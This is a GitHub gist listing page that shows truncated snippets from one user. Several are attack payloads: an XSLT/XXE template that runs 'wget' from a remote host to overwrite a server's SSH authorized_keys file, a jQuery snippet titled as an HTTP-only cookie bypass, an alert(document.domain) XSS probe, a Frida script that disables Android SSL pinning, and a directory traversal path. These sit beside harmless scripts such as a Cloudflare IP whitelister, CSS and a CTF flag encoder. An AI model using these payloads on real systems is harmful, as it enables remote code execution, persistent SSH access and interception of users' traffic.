numanturle
/ gist:ee0151e68f98e518f3a9b9c00306a3c4
Created
May 8, 2020 18:44
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8"?> | |
| <!DOCTYPE dtd_sample[<!ENTITY ext_file SYSTEM "file:///home/xxx/.ssh/authorized_keys">]> | |
| <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> | |
| <xsl:output method="xml" omit-xml-declaration="yes"/> | |
| <xsl:template match="/" | |
| xmlns:xsl="http://www.w3.org/1999/XSL/Transform" | |
| xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"> | |
| <root> | |
| <xsl:variable name="cmd"><![CDATA[wget http://xxxx/geldi -O /home/xxx/.ssh/authorized_keys]]></xsl:variable> | |
| <xsl:variable name="rtObj" select="rt:getRuntime()"/> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Simple bash script to restore visitor real IP under Cloudflare with Nginx | |
| # Script also whitelist cloudflare IP with UFW (if installed) | |
| if [ "$1" = "--ufw" ]; then | |
| CF_UFW_SETUP="y" | |
| fi | |
| if [ -z "$(command -v curl)" ]; then | |
| echo "####################################" |
numanturle
/ gist:80faab01fb767841db81fe4c98587fdc
Last active
December 30, 2024 11:45
laravel bypass http only cookie
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $( document ).ready(function() { | |
| $.ajax({ | |
| url:"/asd", | |
| method:"POST", | |
| async:true, | |
| xhr: function() { | |
| var xhr = jQuery.ajaxSettings.xhr(); | |
| var setRequestHeader = xhr.setRequestHeader; | |
| xhr.setRequestHeader = function(name, value) { | |
| if (name == 'X-Requested-With') return; |
numanturle
/ gist:f8769dcb15d6be2349c410d62d3da9b7
Created
August 4, 2020 10:10
orantısız renk kodları
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <style> | |
| body { | |
| margin:0 auto; | |
| padding:0 auto; | |
| } | |
| span { | |
| float:left; | |
| margin:0; | |
| padding:0; |
numanturle
/ gist:3cd1d12d656f039e39ba18cadeceea8d
Last active
August 4, 2020 17:57
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| alert(document.domain); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| function anim($msg, $time) | |
| { | |
| $msg = str_split($msg); | |
| foreach ($msg as $ms) { | |
| echo $ms; | |
| usleep($time); | |
| } | |
| } | |
| anim(" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $flag = "SODERCTF[C0K_M7_K0L4Y_G3LcI_D3L1_Y1N3_1S_BaSINde_fanta_s3verim]"; | |
| function strigToBinary($string) | |
| { | |
| $characters = str_split($string); | |
| $binary = []; | |
| foreach ($characters as $character) { | |
| $data = unpack('H*', $character); | |
| $binary[] = base_convert($data[1], 16, 2); |
numanturle
/ gist:e566d75fc4573fb9cfba64c534489abf
Created
September 10, 2020 12:24
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Java.perform(function() { | |
| var array_list = Java.use("java.util.ArrayList"); | |
| var ApiClient = Java.use('com.android.org.conscrypt.TrustManagerImpl'); | |
| ApiClient.checkTrustedRecursive.implementation = function(a1, a2, a3, a4, a5, a6) { | |
| // console.log('Bypassing SSL Pinning'); | |
| var k = array_list.$new();return k; | |
| } | |
| }, 0); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /../../../../../../../../../../../.././/etc/telephonyProfiles.d/build_date |
numanturle
/ gist:1e49d11b8601ab19fea5abd8db391ceb
Created
September 29, 2020 12:59
sp - nw - empty - rmo
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cat a | tr " " "\n" | uniq | sed '/^[[:space:]]*$/d' |